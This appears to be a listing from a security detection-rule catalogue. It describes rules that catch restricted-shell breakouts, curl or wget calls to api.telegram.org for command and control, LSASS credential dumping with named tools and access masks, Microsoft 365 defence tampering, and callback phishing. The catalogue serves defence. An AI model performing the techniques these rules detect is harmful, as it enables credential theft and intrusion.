EXPLORE DETECTIONS
Linux Restricted Shell Breakout via Linux Binary(s)
Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary.
Linux SSH X11 Forwarding
This rule monitors for X11 forwarding via SSH. X11 forwarding is a feature that allows users to run graphical applications on a remote server and display the application's graphical user interface on their local machine. Attackers can abuse X11 forwarding for tunneling their GUI-based tools, pivot through compromised systems, and create covert communication channels, enabling lateral movement and facilitating remote control of systems within a network.
Linux Telegram API Request
This rule detects when a process executes the curl or wget command with an argument that includes the api.telegram.org domain. This may indicate command and control behavior.
Linux User Account Creation
Identifies attempts to create new users. Attackers may add new users to establish persistence on a system.
Linux User Account Credential Modification
This rule detects Linux user account credential modification events where the echo command is used to directly echo a password into the passwd or shadow utilities. This technique is used by malware to automate the process of user account credential modification on Linux systems post-infection.
Linux User Added to Privileged Group
Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system.
Linux User or Group Deletion
This rule detects the deletion of user or group accounts on Linux systems. Adversaries may use these commands to remove accounts to cover their tracks or disrupt operations.
Linux Video Recording or Screenshot Activity Detected
This rule monitors for the usage of the most common video recording or screenshot utilities on unix systems by an uncommon process parent. Adversaries may collect video or screenshot data from users or systems for a variety of reasons including espionage, credential theft, or reconnaissance.
LLM-Based Attack Chain Triage by Host
This rule correlates multiple endpoint security alerts from the same host and uses an LLM to analyze command lines, parent processes, file operations, DNS queries, registry modifications, module loads and MITRE ATT&CK tactics progression to determine if they form a coherent attack chain. The LLM provides a verdict (TP/FP/SUSPICIOUS) with confidence score and summary explanation, helping analysts to prioritize hosts exhibiting corroborated malicious behavior while filtering out benign activity.
LLM-Based Compromised User Triage by User
This rule correlates multiple security alerts involving the same user across hosts and data sources, then uses an LLM to analyze whether they indicate account compromise. The LLM evaluates alert patterns, MITRE tactics progression, geographic anomalies, and multi-host activity to provide a verdict and confidence score, helping analysts prioritize users exhibiting indicators of credential theft or unauthorized access.
Loadable Kernel Module Configuration File Creation
This rule detects the creation of Loadable Kernel Module (LKM) configuration files. Attackers may create or modify these files to allow their LKMs to be loaded upon reboot, ensuring persistence on a compromised system.
Local Account TokenFilter Policy Disabled
Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation.
Local Scheduled Task Creation
Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges.
LSASS Memory Dump Creation
Identifies the creation of a Local Security Authority Subsystem Service (lsass.exe) default memory dump. This may indicate a credential access attempt via trusted system utilities such as Task Manager (taskmgr.exe) and SQL Dumper (sqldumper.exe) or known pentesting tools such as Dumpert and AndrewSpecial.
LSASS Memory Dump Handle Access
Identifies handle requests for the Local Security Authority Subsystem Service (LSASS) object access with specific access masks that many tools with a capability to dump memory to disk use (0x1fffff, 0x1010, 0x120089). This rule is tool agnostic as it has been validated against a host of various LSASS dump tools such as SharpDump, Procdump, Mimikatz, Comsvcs etc. It detects this behavior at a low level and does not depend on a specific tool or dump file name.
LSASS Process Access via Windows API
Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory.
M365 Azure Monitor Alert Email with Financial or Billing Theme
Detects Azure Monitor alert notification emails with financial or billing themed subject lines delivered to organization users. Adversaries abuse Azure Monitor alert rules to deliver callback phishing emails from Microsoft's legitimate azure-noreply@microsoft.com address. Because the emails originate from Microsoft's own infrastructure, they pass SPF, DKIM, and DMARC checks, bypassing email security filters and increasing victim trust. The attacker embeds a fraudulent billing or security lure in the alert rule description, which is rendered in the notification email body. Observed subject patterns include invoice numbers, payment references, and order confirmations.
M365 Exchange Anti-Phish Policy Deleted
Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks.
M365 Exchange Anti-Phish Rule Modification
Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.
M365 Exchange DKIM Signing Configuration Disabled
Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.
M365 Exchange Email Safe Attachment Rule Disabled
Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.
M365 Exchange Email Safe Link Policy Disabled
Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.
M365 Exchange Federated Domain Created or Modified
Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.
M365 Exchange Inbox Forwarding Rule Created
Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.